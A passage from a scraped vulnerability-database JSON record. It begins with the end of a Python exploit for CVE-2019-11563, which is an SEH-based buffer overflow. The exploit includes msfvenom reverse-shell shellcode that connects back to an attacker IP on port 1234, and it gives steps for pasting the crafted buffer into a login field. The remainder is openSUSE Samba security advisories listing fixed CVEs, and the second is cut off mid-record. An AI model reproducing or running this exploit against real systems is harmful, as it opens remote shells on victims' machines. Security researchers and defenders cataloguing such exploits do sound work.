0x6a413969 OFFSET 268 #\n# (*) nSEH = 268 -4 #\n# #\n# 69901d06 5E POP ESI #\n# 69901d07 5F POP EDI #\n# 69901d08 C3 RETN #\n# #\n#------------------------------------------------------------#\n\n#msfvenom -p windows/shell_reverse_tcp lport=1234 lhost=192.168.1.101 -f c -b '\\x00\\x0a\\x0d' -a x86 --platform windows EXITFUNC=seh\n\nshellcode =(\n\"\\xb8\\x51\\x9c\\x1c\\xa4\\xda\\xc9\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9\\xb1\"\n\"\\x52\\x31\\x42\\x12\\x83\\xea\\xfc\\x03\\x13\\x92\\xfe\\x51\\x6f\\x42\\x7c\"\n\"\\x99\\x8f\\x93\\xe1\\x13\\x6a\\xa2\\x21\\x47\\xff\\x95\\x91\\x03\\xad\\x19\"\n\"\\x59\\x41\\x45\\xa9\\x2f\\x4e\\x6a\\x1a\\x85\\xa8\\x45\\x9b\\xb6\\x89\\xc4\"\n\"\\x1f\\xc5\\xdd\\x26\\x21\\x06\\x10\\x27\\x66\\x7b\\xd9\\x75\\x3f\\xf7\\x4c\"\n\"\\x69\\x34\\x4d\\x4d\\x02\\x06\\x43\\xd5\\xf7\\xdf\\x62\\xf4\\xa6\\x54\\x3d\"\n\"\\xd6\\x49\\xb8\\x35\\x5f\\x51\\xdd\\x70\\x29\\xea\\x15\\x0e\\xa8\\x3a\\x64\"\n\"\\xef\\x07\\x03\\x48\\x02\\x59\\x44\\x6f\\xfd\\x2c\\xbc\\x93\\x80\\x36\\x7b\"\n\"\\xe9\\x5e\\xb2\\x9f\\x49\\x14\\x64\\x7b\\x6b\\xf9\\xf3\\x08\\x67\\xb6\\x70\"\n\"\\x56\\x64\\x49\\x54\\xed\\x90\\xc2\\x5b\\x21\\x11\\x90\\x7f\\xe5\\x79\\x42\"\n\"\\xe1\\xbc\\x27\\x25\\x1e\\xde\\x87\\x9a\\xba\\x95\\x2a\\xce\\xb6\\xf4\\x22\"\n\"\\x23\\xfb\\x06\\xb3\\x2b\\x8c\\x75\\x81\\xf4\\x26\\x11\\xa9\\x7d\\xe1\\xe6\"\n\"\\xce\\x57\\x55\\x78\\x31\\x58\\xa6\\x51\\xf6\\x0c\\xf6\\xc9\\xdf\\x2c\\x9d\"\n\"\\x09\\xdf\\xf8\\x32\\x59\\x4f\\x53\\xf3\\x09\\x2f\\x03\\x9b\\x43\\xa0\\x7c\"\n\"\\xbb\\x6c\\x6a\\x15\\x56\\x97\\xfd\\xda\\x0f\\x96\\x98\\xb2\\x4d\\x98\\x66\"\n\"\\x91\\xdb\\x7e\\x0c\\x05\\x8a\\x29\\xb9\\xbc\\x97\\xa1\\x58\\x40\\x02\\xcc\"\n\"\\x5b\\xca\\xa1\\x31\\x15\\x3b\\xcf\\x21\\xc2\\xcb\\x9a\\x1b\\x45\\xd3\\x30\"\n\"\\x33\\x09\\x46\\xdf\\xc3\\x44\\x7b\\x48\\x94\\x01\\x4d\\x81\\x70\\xbc\\xf4\"\n\"\\x3b\\x66\\x3d\\x60\\x03\\x22\\x9a\\x51\\x8a\\xab\\x6f\\xed\\xa8\\xbb\\xa9\"\n\"\\xee\\xf4\\xef\\x65\\xb9\\xa2\\x59\\xc0\\x13\\x05\\x33\\x9a\\xc8\\xcf\\xd3\"\n\"\\x5b\\x23\\xd0\\xa5\\x63\\x6e\\xa6\\x49\\xd5\\xc7\\xff\\x76\\xda\\x8f\\xf7\"\n\"\\x0f\\x06\\x30\\xf7\\xda\\x82\\x4e\\x09\\xd6\\x1e\\xc6\\xb0\\x83\\x62\\x8a\"\n\"\\x42\\x7e\\xa0\\xb3\\xc0\\x8a\\x59\\x40\\xd8\\xff\\x5c\\x0c\\x5e\\xec\\x2c\"\n\"\\x1d\\x0b\\x12\\x82\\x1e\\x1e\")\n\nmax_size = 4000\n\nbuf = 'A'*264\nbuf += '\\xeb\\x06\\x90\\x90' #jump short 6-bytes\nbuf += struct.pack('<I', 0x69901d06) #POP ESI, POP EDI, RET avformat-54.dll\nbuf += '\\x90' * 16\nbuf += shellcode\nbuf += 'C'*(max_size - len(buf))\n\nprint '[+] %s bytes buffer created...' %len(buf)\n\ntry:\n filename = 'CVE-2019-11563.txt'\n file = open(filename , 'w')\n file.write(buf)\n print '[+] Evil buffer saved to file: ' + filename\n print '[+] Copy + paste its contents into the \"user\" field and hit login'\n file.close()\nexcept:\n print \"[!] Could not create file!\"", "cvss": {"score": 0.0, "vector": "NONE"}}], "suse": [{"lastseen": "2016-09-04T11:37:02", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5330", "CVE-2016-2112", "CVE-2016-2118", "CVE-2015-3223", "CVE-2015-7560", "CVE-2015-5296", "CVE-2015-8467", "CVE-2015-5252", "CVE-2016-2110", "CVE-2016-2113", "CVE-2015-0240", "CVE-2016-2115", "CVE-2014-8143", "CVE-2015-5370", "CVE-2015-5299", "CVE-2016-2111"], "description": "samba was updated to version 4.2.4 to fix 14 security issues.\n\n These security issues were fixed:\n - CVE-2015-5370: DCERPC server and client were vulnerable to DOS and MITM\n attacks (bsc#936862).\n - CVE-2016-2110: A man-in-the-middle could have downgraded NTLMSSP\n authentication (bsc#973031).\n - CVE-2016-2111: Domain controller netlogon member computer could have\n been spoofed (bsc#973032).\n - CVE-2016-2112: LDAP conenctions were vulnerable to downgrade and MITM\n attack (bsc#973033).\n - CVE-2016-2113: TLS certificate validation were missing (bsc#973034).\n - CVE-2016-2115: Named pipe IPC were vulnerable to MITM attacks\n (bsc#973036).\n - CVE-2016-2118: &quot;Badlock&quot; DCERPC impersonation of authenticated account\n were possible (bsc#971965).\n - CVE-2015-3223: Malicious request can cause Samba LDAP server to hang,\n spinning using CPU (boo#958581).\n - CVE-2015-5330: Remote read memory exploit in LDB (boo#958586).\n - CVE-2015-5252: Insufficient symlink verification (file access outside\n the share)(boo#958582).\n - CVE-2015-5296: No man in the middle protection when forcing smb\n encryption on the client side (boo#958584).\n - CVE-2015-5299: Currently the snapshot browsing is not secure thru\n windows previous version (shadow_copy2) (boo#958583).\n - CVE-2015-8467: Fix Microsoft MS15-096 to prevent machine accounts from\n being changed into user accounts (boo#958585).\n - CVE-2015-7560: Getting and setting Windows ACLs on symlinks can change\n permissions on link target (boo#968222).\n\n These non-security issues were fixed:\n - Fix samba.tests.messaging test and prevent potential tdb corruption by\n removing obsolete now invalid tdb_close call; (boo#974629).\n - Align fsrvp feature sources with upstream version.\n - Obsolete libsmbsharemodes0 from samba-libs and libsmbsharemodes-devel\n from samba-core-devel; (boo#973832).\n - s3:utils/smbget: Fix recursive download; (bso#6482).\n - s3: smbd: posix_acls: Fix check for setting u:g:o entry on a filesystem\n with no ACL support; (bso#10489).\n - docs: Add example for domain logins to smbspool man page; (bso#11643).\n - s3-client: Add a KRB5 wrapper for smbspool; (bso#11690).\n - loadparm: Fix memory leak issue; (bso#11708).\n - lib/tsocket: Work around sockets not supporting FIONREAD; (bso#11714).\n - ctdb-scripts: Drop use of &quot;smbcontrol winbindd ip-dropped ...&quot;;\n (bso#11719).\n - s3:smbd:open: Skip redundant call to file_set_dosmode when creating a\n new file; (bso#11727).\n - param: Fix str_list_v3 to accept &quot;;&quot; again; (bso#11732).\n - Real memeory leak(buildup) issue in loadparm; (bso#11740).\n - Obsolete libsmbclient from libsmbclient0 and libpdb-devel from\n libsamba-passdb-devel while not providing it; (boo#972197).\n - Upgrade on-disk FSRVP server state to new version; (boo#924519).\n - Only obsolete but do not provide gplv2/3 package names; (boo#968973).\n - Enable clustering (CTDB) support; (boo#966271).\n - s3: smbd: Fix timestamp rounding inside SMB2 create; (bso#11703);\n (boo#964023).\n - vfs_fruit: Fix renaming directories with open files; (bso#11065).\n - Fix MacOS finder error 36 when copying folder to Samba; (bso#11347).\n - s3:smbd/oplock: Obey kernel oplock setting when releasing oplocks;\n (bso#11400).\n - Fix copying files with vfs_fruit when using vfs_streams_xattr without\n stream prefix and type suffix; (bso#11466).\n - s3:libsmb: Correctly initialize the list head when keeping a list of\n primary followed by DFS connections; (bso#11624).\n - Reduce the memory footprint of empty string options; (bso#11625).\n - lib/async_req: Do not install async_connect_send_test; (bso#11639).\n - docs: Fix typos in man vfs_gpfs; (bso#11641).\n - smbd: make &quot;hide dot files&quot; option work with &quot;store dos attributes =\n yes&quot;; (bso#11645).\n - smbcacls: Fix uninitialized variable; (bso#11682).\n - s3:smbd: Ignore initial allocation size for directory creation;\n (bso#11684).\n - Changing log level of two entries to from 1 to 3; (bso#9912).\n - vfs_gpfs: Re-enable share modes; (bso#11243).\n - wafsamba: Also build libraries with RELRO protection; (bso#11346).\n - ctdb: Strip trailing spaces from nodes file; (bso#11365).\n - s3-smbd: Fix old DOS client doing wildcard delete - gives a attribute\n type of zero; (bso#11452).\n - nss_wins: Do not run into use after free issues when we access memory\n allocated on the globals and the global being reinitialized; (bso#11563).\n - async_req: Fix non-blocking connect(); (bso#11564).\n - auth: gensec: Fix a memory leak; (bso#11565).\n - lib: util: Make non-critical message a warning; (bso#11566).\n - Fix winbindd crashes with samlogon for trusted domain user; (bso#11569);\n (boo#949022).\n - smbd: Send SMB2 oplock breaks unencrypted; (bso#11570).\n - ctdb: Open the RO tracking db with perms 0600 instead of 0000;\n (bso#11577).\n - manpage: Correct small typo error; (bso#11584).\n - s3: smbd: If EA's are turned off on a share don't allow an SMB2 create\n containing them; (bso#11589).\n - Backport some valgrind fixes from upstream master; (bso#11597).\n - s3: smbd: have_file_open_below() fails to enumerate open files below an\n open directory handle; (bso#11615).\n - docs: Fix some typos in the idmap config section of man 5 smb.conf;\n (bso#11619).\n - Remove redundant configure options while adding with-relro.\n - s3: smbd: Fix our access-based enumeration on &quot;hide unreadable&quot; to match\n Windows; (bso#10252).\n - smbd: Fix file name buflen and padding in notify repsonse; (bso#10634).\n - kerberos: Make sure we only use prompter type when available;\n (bso#11038).\n - s3:ctdbd_conn: Make sure we destroy tevent_fd before closing the socket;\n (bso#11316).\n - dcerpc.idl: accept invalid dcerpc_bind_nak pdus; (bso#11327).\n - Fix a deadlock in tdb; (bso#11381).\n - s3: smbd: Fix mkdir race condition; (bso#11486).\n - pam_winbind: Fix a segfault if initialization fails; (bso#11502).\n - s3: dfs: Fix a crash when the dfs targets are disabled; (bso#11509).\n - s3: smbd: Fix opening/creating :stream files on the root share\n directory; (bso#11522).\n - net: Fix a crash with 'net ads keytab create'; (bso#11528).\n - s3: smbd: Fix a crash in unix_convert() and a NULL pointer bug\n introduced by previous 'raw' stream fix (bso#11522); (bso#11535).\n - vfs_fruit: Return value of ad_pack in vfs_fruit.c; (bso#11543).\n - vfs_commit: Set the fd on open before calling SMB_VFS_FSTAT; (bso#11547).\n - Fix bug in smbstatus where the lease info is not printed; (bso#11549).\n - s3:smbstatus: Add stream name to share_entry_forall(); (bso#11550).\n - Relocate the tmpfiles.d directory to the client package; (boo#947552).\n - Do not provide libpdb0 from libsamba-passdb0 but add it to baselibs.conf\n instead; (boo#942716).\n - Package /var/lib/samba/private/sock with 0700 permissions; (boo#946051).\n - auth/credentials: If credentials have principal set, they are not\n anonymous anymore; (bso#11265).\n - Fix stream names with colon with &quot;fruit:encoding = native&quot;; (bso#11278).\n - s4:rpc_server/netlogon: Fix for NetApp; (bso#11291).\n - lib: Fix rundown of open_socket_out(); (bso#11316).\n - s3:lib: Fix some corner cases of open_socket_out_cleanup(); (bso#11316).\n - vfs:fruit: Implement copyfile style copy_chunk; (bso#11317).\n - ctdb-daemon: Return correct sequence number for CONTROL_GET_DB_SEQNUM;\n (bso#11398).\n - ctdb-scripts: Support monitoring of interestingly named VLANs on bonds;\n (bso#11399).\n - ctdb-daemon: Improve error handling for running event scripts;\n (bso#11431).\n - ctdb-daemon: Check if updates are in flight when releasing all IPs;\n (bso#11432).\n - ctdb-build: Fix building of PCP PMDA module; (bso#11435).\n - Backport dcesrv_netr_DsRGetDCNameEx2 fixes; (bso#11454).\n - vfs_fruit: Handling of empty resource fork; (bso#11467).\n - Avoid quoting problems in user's DNs; (bso#11488).\n - s3-auth: Fix &quot;map to guest = Bad uid&quot;; (bso#9862).\n - s4:lib/tls: Fix build with gnutls 3.4; (bso#8780).\n - s4.2/fsmo.py: Fixed fsmo transfer exception; (bso#10924).\n - winbindd: Sync secrets.ldb into secrets.tdb on startup; (bso#10991).\n - Logon via MS Remote Desktop hangs; (bso#11061).\n - s3: lib: util: Ensure we read a hex number as %x, not %u; (bso#11068).\n - tevent: Add a note to tevent_add_fd(); (bso#11141).\n - s3:param/loadparm: Fix 'testparm --show-all-parameters'; (bso#11170).\n - s3-unix_msg: Remove socket file after closing socket fd; (bso#11217).\n - smbd: Fix a use-after-free; (bso#11218); (boo#919309).\n - s3-rpc_server: Fix rpc_create_tcpip_sockets() processing of interfaces;\n (bso#11245).\n - s3:smb2: Add padding to last command in compound requests; (bso#11277).\n - Add IPv6 support to ADS client side LDAP connects; (bso#11281).\n - Add IPv6 support for determining FQDN during ADS join; (bso#11282).\n - s3: IPv6 enabled DNS connections for ADS client; (bso#11283).\n - Fix invalid write in ctdb_lock_context_destructor; (bso#11293).\n - Excessive cli_resolve_path() usage can slow down transmission;\n (bso#11295).\n - vfs_fruit: Add option &quot;veto_appledouble&quot;; (bso#11305).\n - tstream: Make socketpair nonblocking; (bso#11312).\n - idmap_rfc2307: Fix wbinfo '--gid-to-sid' query; (bso#11313).\n - Group creation: Add msSFU30Name only when --nis-domain was given;\n (bso#11315).\n - tevent_fd needs to be destroyed before closing the fd; (bso#11316).\n - Build fails on Solaris 11 with &quot;\u00c3\u00a2\u00c2\u0080\u00c2\u0098PTHREAD_MUTEX_ROBUST\u00c3\u00a2\u00c2\u0080\u00c2\u0099 undeclared&quot;;\n (bso#11319).\n - smbd/trans2: Add a useful diagnostic for files with bad encoding;\n (bso#11323).\n - Change sharesec output back to previous format; (bso#11324).\n - Robust mutex support broken in 1.3.5; (bso#11326).\n - Kerberos auth info3 should contain resource group ids available from\n pac_logon; winbindd: winbindd_raw_kerberos_login - ensure logon_info\n exists in PAC; (bso#11328); (boo#912457).\n - s3:smb2_setinfo: Fix memory leak in the defer_rename case; (bso#11329).\n - tevent: Fix CID 1035381 Unchecked return value; (bso#11330).\n - tdb: Fix CID 1034842 and 1034841 Resource leaks; (bso#11331).\n - s3: smbd: Use separate flag to track become_root()/unbecome_root()\n state; (bso#11339).\n - s3: smbd: Codenomicon crash in do_smb_load_module(); (bso#11342).\n - pidl: Make the compilation of PIDL producing the same results if the\n content hasn't change; (bso#11356).\n - winbindd: Disconnect child process if request is cancelled at main\n process; (bso#11358).\n - vfs_fruit: Check offset and length for AFP_AfpInfo read requests;\n (bso#11363).\n - docs: Overhaul the description of &quot;smb encrypt&quot; to include SMB3\n encryption; (bso#11366).\n - s3:auth_domain: Fix talloc problem in\n connect_to_domain_password_server(); (bso#11367).\n - ncacn_http: Fix GNUism; (bso#11371).\n - Backport changes to use resource group sids obtained from pac\n logon_info; (bso#11328); (boo#912457).\n - Order winbind.service Before and Want nss-user-lookup target.\n - s3:smbXsrv: refactor duplicate code into\n smbXsrv_session_clear_and_logoff(); (bso#11182).\n - gencache: don't fail gencache_stabilize if there were records to delete;\n (bso#11260).\n - s3: libsmbclient: After getting attribute server, ensure main srv\n pointer is still valid; (bso#11186).\n - s4: rpc: Refactor dcesrv_alter() function into setup and send steps;\n (bso#11236).\n - s3: smbd: Incorrect file size returned in the response of\n &quot;FILE_SUPERSEDE Create&quot;; (bso#11240).\n - Mangled names do not work with acl_xattr; (bso#11249).\n - nmbd rewrites browse.dat when not required; (bso#11254).\n - vfs_fruit: add option &quot;nfs_aces&quot; that controls the NFS ACEs stuff;\n (bso#11213).\n - s3:smbd: Add missing tevent_req_nterror; (bso#11224).\n - vfs: kernel_flock and named streams; (bso#11243).\n - vfs_gpfs: Error code path doesn't call END_PROFILE; (bso#11244).\n - s4: libcli/finddcs_cldap: continue processing CLDAP until all addresses\n are used; (bso#11284).\n - ctdb: check for talloc_asprintf() failure; (bso#11201).\n - spoolss: purge the printer name cache on name change; (bso#11210);\n (boo#901813).\n - CTDB statd-callout does not scale; (bso#11204).\n - vfs_fruit: also map characters below 0x20; (bso#11221).\n - ctdb: Coverity fix for CID 1291643; (bso#11201).\n - Multiplexed RPC connections are not handled by DCERPC server;\n (bso#11225).\n - Fix terminate connection behavior for asynchronous endpoint with PUSH\n notification flavors; (bso#11226).\n - ctdb-scripts: Fix bashism in ctdbd_wrapper script; (bso#11007).\n - ctdb: Fix CIDs 1125615, 1125634, 1125613, 1288201 and 1125553;\n (bso#11201).\n - SMB2 should cancel pending NOTIFY calls with DELETE_PENDING if the\n directory is deleted; (bso#11257).\n - s3:winbindd: make sure we remove pending io requests before closing\n client\n - 'sharesec' output no longer matches input format; (bso#11237).\n - waf: Fix systemd detection; (bso#11200).\n - CTDB: Fix portability issues; (bso#11202).\n - CTDB: Fix some IPv6-related issues; (bso#11203).\n - CTDB statd-callout does not scale; (bso#11204).\n - 'net ads dns gethostbyname' crashes with an error in TALLOC_FREE if you\n enter invalid values; (bso#11234).\n - libads: record service ticket endtime for sealed ldap connections;\n - lib/util: Include DEBUG macro in internal header files before\n samba_util.h; (bso#11033).\n - Initialize dwFlags field of DNS_RPC_NODE structure; (bso#9791).\n - s3: lib: ntlmssp: If NTLMSSP_NEGOTIATE_TARGET_INFO isn't set, cope with\n servers that don't send the 2 unused fields; (bso#10016).\n - build:wafadmin: Fix use of spaces instead of tabs; (bso#10476).\n - waf: Fix the build on openbsd; (bso#10476).\n - s3: client: &quot;client use spnego principal = yes&quot; code checks wrong name;\n - spoolss: Retrieve published printer GUID if not in registry; (bso#11018).\n - vfs_fruit: Enhance handling of malformed AppleDouble files; (bso#11125).\n - backupkey: Explicitly link to gnutls and gcrypt; (bso#11135).\n - replace: Remove superfluous check for gcrypt header; (bso#11135).\n - Backport subunit changes; (bso#11137).\n - libcli/auth: Match Declaration of netlogon_creds_cli_context_tmp with\n implementation; (bso#11140).\n - s3-winbind: Fix cached user group lookup of trusted domains; (bso#11143).\n - talloc: Version 2.1.2; (bso#11144).\n - Update libwbclient version to 0.12; (bso#11149).\n - brlock: Use 0 instead of empty initializer list; (bso#11153).\n - s4:auth/gensec_gssapi: Let gensec_gssapi_update() return\n - backupkey: Use ndr_pull_struct_blob_all(); (bso#11174).\n - Fix lots of winbindd zombie processes on Solaris platform; (bso#11175).\n - Prevent samba package updates from disabling samba kerberos printing.\n - Add sparse file support for samba; (fate#318424).\n - Simplify libxslt build requirement and README.SUSE install.\n - Remove no longer required cleanup steps while populating the build root.\n - smbd: Stop using vfs_Chdir after SMB_VFS_DISCONNECT; (bso#1115).\n - pam_winbind: fix warn_pwd_expire implementation; (bso#9056).\n - nsswitch: Fix soname of linux nss_*.so.2 modules; (bso#9299).\n - Make 'profiles' work again; (bso#9629).\n - s3:smb2_server: protect against integer wrap with &quot;smb2 max credits =\n 65535&quot;; (bso#9702).\n - Make validate_ldb of String(Generalized-Time) accept millisecond format\n &quot;.000Z&quot;; (bso#9810).\n - Use -R linker flag on Solaris, not -rpath; (bso#10112).\n - vfs: Add glusterfs manpage; (bso#10240).\n - Make 'smbclient' use cached creds; (bso#10279).\n - pdb: Fix build issues with shared modules; (bso#10355).\n - s4-dns: Add support for BIND 9.10; (bso#10620).\n - idmap: Return the correct id type to *id_to_sid methods; (bso#10720).\n - printing/cups: Pack requested-attributes with IPP_TAG_KEYWORD;\n (bso#10808).\n - Don't build vfs_snapper on FreeBSD; (bso#10834).\n - nss_winbind: Add getgroupmembership for FreeBSD; (bso#10835).\n - idmap_rfc2307: Fix a crash after connection problem to DC; (bso#10837).\n - s3: smb2cli: query info return length check was reversed; (bso#10848).\n - s3: lib, s3: modules: Fix compilation on Solaris; (bso#10849).\n - lib: uid_wrapper: Fix setgroups and syscall detection on a system\n without native uid_wrapper library; (bso#10851).\n - winbind3: Fix pwent variable substitution; (bso#10852).\n - Improve samba-regedit; (bso#10859).\n - registry: Don't leave dangling transactions; (bso#10860).\n - Fix build of socket_wrapper on systems without SO_PROTOCOL; (bso#10861).\n - build: Do not install 'texpect' binary anymore; (bso#10862).\n - Fix testparm to show hidden share defaults; (bso#10864).\n - libcli/smb: Fix smb2cli_validate_negotiate_info with min=PROTOCOL_NT1\n max=PROTOCOL_SMB2_02; (bso#10866).\n - Integrate CTDB into top-level Samba build; (bso#10892).\n - samba-tool group add: Add option '--nis-domain' and '--gid'; (bso#10895).\n - s3-nmbd: Fix netbios name truncation; (bso#10896).\n - spoolss: Fix handling of bad EnumJobs levels; (bso#10898).\n - Fix smbclient loops doing a directory listing against Mac OS X 10 server\n with a non-wildcard path; (bso#10904).\n - Fix print job enumeration; (bso#10905); (boo#898031).\n - samba-tool: Create NIS enabled users and unixHomeDirectory attribute;\n (bso#10909).\n - Add support for SMB2 leases; (bso#10911).\n - btrfs: Don't leak opened directory handle; (bso#10918).\n - s3: nmbd: Ensure NetBIOS names are only 15 characters stored;\n (bso#10920).\n - s3:smbd: Fix file corruption using &quot;write cache size != 0&quot;; (bso#10921).\n - pdb_tdb: Fix a TALLOC/SAFE_FREE mixup; (bso#10932).\n - s3-keytab: fix keytab array NULL termination; (bso#10933).\n - s3:passdb: fix logic in pdb_set_pw_history(); (bso#10940).\n - Cleanup add_string_to_array and usage; (bso#10942).\n - dbwrap_ctdb: Pass on mutex flags to tdb_open; (bso#10942).\n - Fix RootDSE search with extended dn control; (bso#10949).\n - Fix 'samba-tool dns serverinfo &lt;server&gt;' for IPv6; (bso#10952).\n - libcli/smb: only force signing of smb2 session setups when binding a new\n session; (bso#10958).\n - s3-smbclient: Return success if we listed the shares; (bso#10960).\n - s3-smbstatus: Fix exit code of profile output; (bso#10961).\n - socket_wrapper: Add missing prototype check for eventfd; (bso#10965).\n - libcli: SMB2: Pure SMB2-only negprot fix to make us behave as a Windows\n client does; (bso#10966).\n - vfs_streams_xattr: Check stream type; (bso#10971).\n - s3: smbd: Fix *allocate* calls to follow POSIX error return convention;\n (bso#10982).\n - vfs_fruit: Add support for AAPL; (bso#10983).\n - Fix spoolss IDL response marshalling when returning error without\n clearing info; (bso#10984).\n - dsdb-samldb: Check for extended access rights before we allow changes to\n userAccountControl; (bso#10993); CVE-2014-8143; (boo#914279).\n - Fix IPv6 support in CTDB; (bso#10996).\n - ctdb-daemon: Use correct tdb flags when enabling robust mutex support;\n (bso#11000).\n - vfs_streams_xattr: Add missing call to SMB_VFS_NEXT_CONNECT; (bso#11005).\n - s3-util: Fix authentication with long hostnames; (bso#11008).\n - ctdb-build: Fix build without xsltproc; (bso#11014).\n - packaging: Include CTDB man pages in the tarball; (bso#11014).\n - pdb_get_trusteddom_pw() fails with non valid UTF16 random passwords;\n (bso#11016).\n - Make Sharepoint search show user documents; (bso#11022).\n - nss_wrapper: check for nss.h; (bso#11026).\n - Enable mutexes in gencache_notrans.tdb; (bso#11032).\n - tdb_wrap: Make mutexes easier to use; (bso#11032).\n - lib/util: Avoid collision which alread defined consumer DEBUG macro;\n (bso#11033).\n - winbind: Retry after SESSION_EXPIRED error in ping-dc; (bso#11034).\n - s3-libads: Fix a possible segfault in kerberos_fetch_pac(); (bso#11037).\n - vfs_fruit: Fix base_fsp name conversion; (bso#11039).\n - vfs_fruit: mmap under FreeBSD needs PROT_READ; (bso#11040).\n - Fix authentication using Kerberos (not AD); (bso#11044).\n - net: Fix sam addgroupmem; (bso#11051).\n - vfs_snapper: Correctly handles multi-byte DBus strings; (bso#11055);\n (boo#913238).\n - cli_connect_nb_send: Don't segfault on host == NULL; (bso#11058).\n - utils: Fix 'net time' segfault; (bso#11058).\n - libsmb: Provide authinfo domain for encrypted session referrals;\n (bso#11059).\n - s3-pam_smbpass: Fix memory leak in pam_sm_authenticate(); (bso#11066).\n - vfs_glusterfs: Add comments to the pipe(2) code; (bso#11069).\n - vfs/glusterfs: Change xattr key to match gluster key; (bso#11069).\n - vfs_glusterfs: Implement AIO support; (bso#11069).\n - s3-vfs: Fix developer build of vfs_ceph module; (bso#11070).\n - s3: netlogon: Ensure we don't call talloc_free on an uninitialized\n pointer; (bso#11077); CVE-2015-0240; (boo#917376).\n - vfs: Add a brief vfs_ceph manpage; (bso#11088).\n - s3: smbclient: Allinfo leaves the file handle open; (bso#11094).\n - Fix Win8.1 Credentials Manager issue after KB2992611 on Samba domain;\n (bso#11097).\n - debug: Set close-on-exec for the main log file FD; (bso#11100).\n - s3: smbd: leases - losen paranoia check. Stat opens can grant leases;\n (bso#11102).\n - s3: smbd: SMB2 close. If a file has delete on close, store the return\n info before deleting; (bso#11104).\n - doc:man:vfs_glusterfs: improve the configuration section; (bso#11117).\n - snprintf: Try to support %j; (bso#11119).\n - ctdb-io: Do not use sys_write to write to client sockets; (bso#11124).\n - doc-xml: Add 'sharesec' reference to 'access based share enum';\n (bso#11127).\n - Fix usage of freed memory on server exit; (bso#11218); (boo#919309).\n - Adjust baselibs.conf due to libpdb0 package rename to libsamba-passdb0.\n - Add libsamba-debug, libsocket-blocking, libsamba-cluster-support, and\n libhttp to the libs package; (boo#913547).\n - Rebase File Server Remote VSS Protocol (FSRVP) server against 4.2.0rc1;\n (fate#313346).\n\n", "edition": 1, "modified": "2016-04-17T15:11:14", "published": "2016-04-17T15:11:14", "id": "OPENSUSE-SU-2016:1064-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-04/msg00042.html", "title": "Security update for samba (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:15:18", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2112", "CVE-2016-2118", "CVE-2016-2110", "CVE-2016-2113", "CVE-2016-2115", "CVE-2015-5370", "CVE-2016-2111"], "description": "Samba was updated to the 4.2.x codestream, bringing some new features and\n security fixes (bsc#973832, FATE#320709).\n\n These security issues were fixed:\n - CVE-2015-5370: DCERPC server and client were vulnerable to DOS and MITM\n attacks (bsc#936862).\n - CVE-2016-2110: A man-in-the-middle could have downgraded NTLMSSP\n authentication (bsc#973031).\n - CVE-2016-2111: Domain controller netlogon member computer could have\n been spoofed (bsc#973032).\n - CVE-2016-2112: LDAP conenctions were vulnerable to downgrade and MITM\n attack (bsc#973033).\n - CVE-2016-2113: TLS certificate validation were missing (bsc#973034).\n - CVE-2016-2115: Named pipe IPC were vulnerable to MITM attacks\n (bsc#973036).\n - CVE-2016-2118: &quot;Badlock&quot; DCERPC impersonation of authenticated account\n were possible (bsc#971965).\n\n Also the following fixes were done:\n - Upgrade on-disk FSRVP server state to new version; (bsc#924519).\n - Fix samba.tests.messaging test and prevent potential tdb corruption by\n removing obsolete now invalid tdb_close call; (bsc#974629).\n - Align fsrvp feature sources with upstream version.\n - Obsolete libsmbsharemodes0 from samba-libs and libsmbsharemodes-devel\n from samba-core-devel; (bsc#973832).\n - s3:utils/smbget: Fix recursive download; (bso#6482).\n - s3: smbd: posix_acls: Fix check for setting u:g:o entry on a filesystem\n with no ACL support; (bso#10489).\n - docs: Add example for domain logins to smbspool man page; (bso#11643).\n - s3-client: Add a KRB5 wrapper for smbspool; (bso#11690).\n - loadparm: Fix memory leak issue; (bso#11708).\n - lib/tsocket: Work around sockets not supporting FIONREAD; (bso#11714).\n - ctdb-scripts: Drop use of &quot;smbcontrol winbindd ip-dropped ...&quot;;\n (bso#11719).\n - s3:smbd:open: Skip redundant call to file_set_dosmode when creating a\n new file; (bso#11727).\n - param: Fix str_list_v3 to accept &quot;;&quot; again; (bso#11732).\n - Real memeory leak(buildup) issue in loadparm; (bso#11740).\n - Obsolete libsmbclient from libsmbclient0 and libpdb-devel from\n libsamba-passdb-devel while not providing it; (bsc#972197).\n - Getting and setting Windows ACLs on symlinks can change permissions on\n link\n - Only obsolete but do not provide gplv2/3 package names; (bsc#968973).\n - Enable clustering (CTDB) support; (bsc#966271).\n - s3: smbd: Fix timestamp rounding inside SMB2 create; (bso#11703);\n (bsc#964023).\n - vfs_fruit: Fix renaming directories with open files; (bso#11065).\n - Fix MacOS finder error 36 when copying folder to Samba; (bso#11347).\n - s3:smbd/oplock: Obey kernel oplock setting when releasing oplocks;\n (bso#11400).\n - Fix copying files with vfs_fruit when using vfs_streams_xattr without\n stream prefix and type suffix; (bso#11466).\n - s3:libsmb: Correctly initialize the list head when keeping a list of\n primary followed by DFS connections; (bso#11624).\n - Reduce the memory footprint of empty string options; (bso#11625).\n - lib/async_req: Do not install async_connect_send_test; (bso#11639).\n - docs: Fix typos in man vfs_gpfs; (bso#11641).\n - smbd: make &quot;hide dot files&quot; option work with &quot;store dos attributes =\n yes&quot;; (bso#11645).\n - smbcacls: Fix uninitialized variable; (bso#11682).\n - s3:smbd: Ignore initial allocation size for directory creation;\n (bso#11684).\n - Changing log level of two entries to from 1 to 3; (bso#9912).\n - vfs_gpfs: Re-enable share modes; (bso#11243).\n - wafsamba: Also build libraries with RELRO protection; (bso#11346).\n - ctdb: Strip trailing spaces from nodes file; (bso#11365).\n - s3-smbd: Fix old DOS client doing wildcard delete - gives a attribute\n type of zero; (bso#11452).\n - nss_wins: Do not run into use after free issues when we access memory\n allocated on the globals and the global being reinitialized; (bso#11563).\n - async_req: Fix non-blocking connect(); (bso#11564).\n - auth: gensec: Fix a memory leak; (bso#11565).\n - lib: util: Make non-critical message a warning; (bso#11566).\n - Fix winbindd crashes with samlogon for trusted domain user; (bso#11569);\n (bsc#949022).\n - smbd: Send SMB2 oplock breaks unencrypted; (bso#11570).\n - ctdb: Open the RO tracking db with perms 0600 instead of 0000;\n (bso#11577).\n - manpage: Correct small typo error; (bso#11584).\n - s3: smbd: If EA's are turned off on a share don't allow an SMB2 create\n containing 